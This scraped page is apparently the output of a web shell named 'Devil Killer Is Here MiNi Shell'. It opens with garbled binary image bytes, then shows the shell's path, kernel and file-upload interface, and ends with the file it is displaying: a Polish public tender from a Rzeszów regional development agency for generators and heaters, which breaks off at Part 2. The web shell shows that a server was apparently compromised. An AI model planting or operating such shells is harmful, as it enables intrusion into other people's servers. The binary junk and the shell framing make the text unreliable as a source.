JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231107/0048053501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa agregatów prądotwórczych i grzejników elektrycznych (2 części). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rzeszowska Agencja Rozwoju Regionalnego Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690260330</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szopena 51</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-959</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@rarr.rzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rarr.rzeszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa agregatów prądotwórczych i grzejników elektrycznych (2 części). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0551d1d-7ca2-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00480535</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Podkarpacki Inkubator Wspierania Ukraińskich Inicjatyw </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/842826 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1)	wyłącznie poprzez Platformę Zakupową i komunikaty publiczne oraz prywatne, dostępną pod adresem: https://platformazakupowa.pl/transakcja/842826<br/>2)	lub w przypadku awarii powyższego: drogą elektroniczną: na adres mailowy zamowienia.publiczne@rarr.rzeszow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale VII ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem Państwa danych osobowych w rozumieniu Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 5/46/WE („RODO”) jest Rzeszowska Agencja Rozwoju Regionalnego S.A. ul. Szopena 51, 35-959 Rzeszów, e-mail: sekretariat@rarr.rzeszow.pl. <br/>2.	W sprawach związanych z Państwa danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, wysyłając e-mail na adres: iod@rarr.rzeszow.pl.<br/>3.	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego pod nazwą Dostawa agregatów prądotwórczych i grzejników elektrycznych (2 części) – znak sprawy: BS.2611.54.2023 oraz jego rozstrzygnięciem, jak również zawarciem umowy w sprawie zamówienia publicznego, a także udokumentowaniem postępowania o udzielenie zamówienia publicznego i jego archiwizacją.<br/>4.	Odbiorcami Państwa danych osobowych będą:<br/>•	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2023 r., poz. 1605 ze zm.), dalej „ustawa Pzp”, <br/>•	podmioty świadczące na rzecz Administratora usługi prawne, informatyczne, hostingowe, księgowo-finansowe, kurierskie i pocztowe oraz inne, z którymi Administrator zawrze umowy powierzenia przetwarzania danych osobowych, a także właściciel platformy zakupowej, na której Administrator prowadzi postępowania o udzielenia zamówienia publicznego i jego podwykonawcy. <br/>5.	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postepowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Państwa dane osobowe mogą być jednak przechowywane dłużej ze względu na obowiązującą u Administratora Instrukcję Kancelaryjną obejmującą Jednolity Rzeczowy Wykaz Akt. W przypadku prowadzenia postępowań na roboty budowlane lub usługi – okres przechowywania dokumentacji postępowania wynosi 5 lat od dnia zakończenia postępowania o zawarcie umowy koncesji, a w przypadku gdy czas trwania umowy koncesji przekracza 5 lat – przez okres jego trwania. <br/>6.	Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>7.	Mając na uwadze powyższe przysługuje Państwu prawo do: <br/>•	na podstawie art. 15 RODO prawo dostępu do Państwa danych osobowych dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Państwa danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>•	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8.	Nie przysługuje Państwu:<br/>•	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych; <br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>9.	W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. <br/>10.	Administrator nie zamierza przekazywać Państwa danych osobowych do państw trzecich lub organizacji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BS.2611.54.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 733560,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I<br/>Przedmiotem zamówienia dla części I jest dostawa trzech rodzajów agregatów prądotwórczych, których minimalne parametry techniczne zostały wskazane poniżej. <br/><br/>1) Agregaty jednofazowe - wersja na ramie - silnik z prądnicą na ramie – 50 szt.<br/><br/>1.	Wymagania ogólne<br/>•	agregat fabrycznie nowy rok produkcji min. 2023 r.,<br/>•	gwarancja min. 48 miesięcy,<br/>•	moc (zgodnie z ISO8528): <br/>o	praca nominalna P.R.P ¬-nie mniej niż 5,6 kW,<br/>o	praca awaryjna L.T. P. – nie mniej niż 6,2 kW,<br/>•	napięcie : 230, 50 Hz,<br/>•	prąd znamionowy min. 24,3 A,<br/>•	stopień ochrony prądnicy: IP23,<br/>•	wymiary zewnętrzne maksymalne 790 x 590x 505 (długość x szerokość x wysokość) mm,<br/>•	waga 69 kg (+/- 1 kg),<br/>•	rozruch manualny na linkę rewersyjną ,<br/>•	gniazda 16A 3P typu Schuko 1 szt., Gniazdo 32A 3P IP 44 -1 szt.,<br/>•	wyłącznik termiczny,<br/>•	zbiornik paliwa zintegrowany z ramą pozwalający na min. 2,25 h pracy z obciążeniem 75% bez uzupełniania paliwa,<br/>•	wersja na ramie,<br/>•	dostarczony z płynami eksploatacyjnymi (prócz paliwa)<br/>•	moc akustyczna Lwa – max 97 dB(A)<br/>2.	Dane ogólne silnika zespołu prądotwórczego<br/>•	nominalna prędkość obrotowa: min. 3000 obr/min,<br/>•	silnik benzynowy, 1cylindrowy, <br/>•	pojemność min. 389 cm3,<br/>•	pojemność zbiornika na paliwo: min. 6,1 litra,<br/>•	średnica x skok: 88 x 64 mm,<br/>•	moc maximum 11 KM,<br/>•	zużycie paliwa max. 2,7 l/h przy 75% obciążenia,<br/>•	układ paliwowy: gaźnik ,<br/>•	silnik zabezpieczony przed niskim poziomem oleju,<br/>•	serwis na terenie Polski.<br/><br/>3.	Dane ogólne prądnicy zespołu prądotwórczego<br/>•	konstrukcja: Szczotkowa, synchroniczna, samowzbudna,<br/>•	stopień ochrony co najmniej IP23,<br/>•	miedziane uzwojenie,<br/>•	elektroniczny regulator napięcia Analog,<br/>•	stabilizacja napięcia: +/- 2%,<br/>•	prąd startowy 3,<br/>•	klasa izolacji: H.<br/><br/>2) Agregaty trójfazowe (400 V/230V) – Wersja na ramie – silnik z prądnicą na ramie – 16 szt.<br/><br/>1.	Wymagania ogólne<br/>•	agregat fabrycznie nowy rok produkcji min. 2023 r.,<br/>•	gwarancja min. 48 miesięcy.<br/>•	moc (zgodnie z ISO8528): <br/>o	Praca nominalna P.R.P ¬3F - nie mniej niż 12,5 kW<br/>o	Praca awaryjna L.T. P. –¬3F nie mniej niż 14,5 kW<br/>o	Praca nominalna P.R.P ¬1F -nie mniej niż 5,4 kW<br/>o	Praca awaryjna L.T. P. –¬1F nie mniej niż 6 kW<br/>o	Napięcie : 230/400V, 50 Hz<br/>o	Prąd znamionowy 3F min. 18,1 A<br/>o	Prąd znamionowy F min. 23, 5A<br/>•	stopień ochrony prądnicy: IP23,<br/>•	wymiary zewnętrzne maksymalne 790 x 580x 748 (długość x szerokość x wysokość) mm,<br/>•	waga: do 131 kg,<br/>•	rozruch elektryczny i na linkę rewersyjną,<br/>•	zintegrowany wyłącznik główny prądnicy,<br/>•	gniazda 16A 3P, 23A typu Schuko oraz 32A 5P IP 44,<br/>•	licznik czasu pracy: TAK,<br/>•	zbiornik paliwa zintegrowany z ramą pozwalający na min. 9,15 h pracy z obciążeniem 75% bez uzupełniania paliwa,<br/>•	wersja na ramie,<br/>•	dostarczony z płynami eksploatacyjnymi (prócz paliwa),<br/>•	moc akustyczna Lwa – max. 97 dB(A),<br/><br/>2.	Dane ogólne silnika zespołu prądotwórczego<br/>•	nominalna prędkość obrotowa: 3000 obr/min,<br/>•	silnik benzynowy, 2 cylindrowy, <br/>•	pojemność min. 627 cm3,<br/>•	moc maximum 21 HP,<br/>•	zużycie paliwa max. 4,5 l/h przy 75% obciążenia,<br/>•	układ paliwowy: gaźnik, <br/>•	silnik zabezpieczony przed niskim poziomem oleju,<br/>•	serwis na terenie Polski.<br/><br/>3.	Dane ogólne prądnicy zespołu prądotwórczego<br/>•	konstrukcja: Szczotkowa, synchroniczna, samowzbudna,<br/>•	stopień ochrony co najmniej IP23,<br/>•	miedziane uzwojenie,<br/>•	elektroniczny regulator napięcia Analog,<br/>•	stabilizacja napięcia: +/- 1,5%,<br/>•	prąd startowy 3,<br/>•	klasa izolacji: H.<br/><br/>3) Agregaty trójfazowe (400 V/230V) – Wersja obudowana wyciszona przystosowana do pracy na zewnątrz – 8 szt.<br/><br/>1.	Wymagania ogólne<br/>•	agregat fabrycznie nowy rok produkcji min. 2023 r.,<br/>•	gwarancja min. 48 miesięcy,<br/>•	moc (zgodnie z ISO8528): <br/>o	Praca nominalna P.R.P ¬-nie mniej niż 17,5 kVA , 14 kW<br/>o	Praca awaryjna L.T. P. – nie mniej niż 19 kVA, 15,2 kW<br/>o	Praca nominalna P.R.P ¬1F -nie mniej niż 9 kW<br/>o	Praca awaryjna L.T. P. –¬1F nie mniej niż 9,9 kW<br/>•	napięcie : 230/400 V, 50 Hz,<br/>•	prąd znamionowy 3f min. 25 A,<br/>•	prąd znamionowy 1f min. 39,1 A,<br/>•	stopień ochrony prądnicy: IP23,<br/>•	wymiary zewnętrzne maksymalne 1197 x 795 x 1209 (długość x szerokość x wysokość) mm,<br/>•	waga do 247 kg,<br/>•	rozruch elektryczny + dodatkowo agregat przygotowany do podłączenia układu SZR,<br/>•	zintegrowany wyłącznik główny prądnicy,<br/>•	wyłącznik awaryjny,<br/>•	zbiornik paliwa zintegrowany z ramą pozwalający na min. 6,92 h pracy z obciążeniem 75% bez uzupełniania paliwa,<br/>•	wersja w obudowie wyciszonej, odpornej na warunki atmosferyczne,<br/>•	dostarczony z płynami eksploatacyjnymi (prócz paliwa),<br/>•	agregat w obudowie wyciszonej Moc akustyczna Lwa – max 96 dB(A),<br/><br/>2.	Dane ogólne silnika zespołu prądotwórczego<br/>•	nominalna prędkość obrotowa: 3000 obr/min,<br/>•	silnik benzynowy, 2 cylindrowy, widlasty,<br/>•	pojemność min. 896 cm3,<br/>•	moc maximum 31 HP,<br/>•	instalacja 12 V DC,<br/>•	zużycie paliwa max. 6,5 l/h przy 75% obciążenia,<br/>•	układ paliwowy: gaźnik ,<br/>•	silnik zabezpieczony przed niskim poziomem oleju,<br/>•	serwis na terenie Polski.<br/><br/>3.	Dane ogólne prądnicy zespołu prądotwórczego<br/>•	konstrukcja: szczotkowa, synchroniczna, samowzbudna,<br/>•	stopień ochrony co najmniej IP23,<br/>•	miedziane uzwojenie,<br/>•	elektroniczny regulator napięcia DIGITAL,<br/>•	stabilizacja napięcia: +/- 1%,<br/>•	klasa izolacji: H.<br/><br/>UWAGA! Wykonawca, który będzie realizował zamówienie, musi posiadać stosowne doświadczenie, które potwierdzi zdolności do należytego wykonania umowy, wskazujące, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej jedno zadanie/dostawę odpowiadające swoim rodzajem przedmiotowi zamówienia tj. dostawa agregatów prądotwórczych o wartości minimum 500 000,00 zł brutto (słownie: pięćset tysięcy złotych brutto).<br/>Zamawiający zastrzega sobie prawo do zweryfikowania posiadanego doświadczenia przed podpisaniem umowy z Wykonawcą, którego oferta uznana zostanie za najkorzystniejszą. Wówczas, Wykonawca na wezwanie Zamawiającego, musi obligatoryjnie przedłożyć dokumenty, które potwierdzą posiadanie wskazanego doświadczenia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 694560,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) K1: Cena – 60 %. <br/>2) K2: Termin dostawy zamówienia – 40 % <br/><br/>Ad 1) Kryterium: Cena - znaczenie w ocenie 60%<br/>Punkty zostaną przyznane wg wzoru: <br/><br/>Najniższa cena spośród ofert niepodlegających odrzuceniu/Cena badanej oferty brutto X 60 % x 100 = …… pkt<br/><br/>Maksymalna ilość punktów w ramach tego kryterium: 60 punktów<br/><br/>Ad 2) Kryterium: Termin dostawy zamówienia – znaczenie w ocenie 40%. <br/>Punkty za kryterium „Termin dostawy zamówienia” zostaną przyznane w skali punktowej do 40 pkt, na podstawie deklaracji wykonawcy złożonej w formularzu ofertowym.<br/>Ilość punktów zostanie przyznana następująco:<br/>- 0 punktów za zadeklarowanie dostawy zamówienia do 15 dni kalendarzowych,<br/>- 20 punktów za zadeklarowanie dostawy zamówienia do 10 dni kalendarzowych, <br/>- 40 punktów za zadeklarowanie dostawy zamówienia do 5 dni kalendarzowych<br/><br/>Zadeklarowany termin będzie liczony od dnia podpisania umowy.<br/><br/>Deklarowana termin dostawy zamówienia, dotyczy wszystkich elementów, na które składa się zamówienie. Punkty w kryterium „Termin dostawy zamówienia” zostaną przyznane tylko w przypadku złożenia przez Wykonawcę oświadczenia, na podstawie którego będzie można przyznać punkty w tym kryterium. W przypadku nie złożenia oświadczenia lub zaznaczenia więcej niż jednego wariantu, oferta otrzyma w tym kryterium 0 punktów, a Zamawiający uzna, że Wykonawca zaoferował maksymalny czas (termin) dostawy zamówienia. Nie będzie to jednak podstawą do odrzucenia oferty. <br/><br/>2. Za najkorzystniejszą uznana zostanie ta oferta, która uzyska najwyższą liczbę punktów (K1+K2). Liczba uzyskanych punktów będzie zaokrąglana do dwóch miejsc po przecinku. Ocenie będą podlegały oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> 